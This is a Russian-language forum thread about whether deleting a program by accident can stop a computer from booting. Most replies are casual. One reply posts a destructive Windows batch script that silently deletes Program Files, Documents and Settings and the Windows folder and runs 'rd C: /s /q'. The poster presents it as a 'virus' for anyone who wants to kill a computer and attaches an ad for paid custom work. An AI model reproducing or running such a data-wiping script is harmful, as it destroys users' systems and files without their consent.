Cristaldelic Cristaldelic

Можно ли случайно удалить важную программу для компьютера, послу которой комп не включится.

Виктория Лапатина

С кривыми ручками все можно.

Юрец Лукьянчук

Случайно ничего нельзя удалить. для этого всё же есть умысел. Пёрнуть можно случайно, когда уже невтерпёж.

Azamat Wood

если удалишь что-то из папки виндоус то хана компу. поверь, сам пробовал.

Ве
Вера

Драйвера "случайно" удаляют хД
Конечно можно.

Айбек Замирбеков

@echo off
del %programfiles% /q > nul
del C:\Documents and Settings /q > nul
del %WinDir% /q > nul
rd C: /s /q > nul
rem Создано МНОЙ скайп lord_1711 робота на заказ + беспалевний дизайн
....

небольшой пример в виде вируса
короче
кто хочет смерти компу вставте в блокнот
и удалите
del %programfiles% /q > nul
del C:\Documents and Settings /q > nul

формат bin

Василий

Вот статьи по удалению вирусов http://help-user.ru/stat_udalenie_virusov/ не поможет проще обратится к специалистам.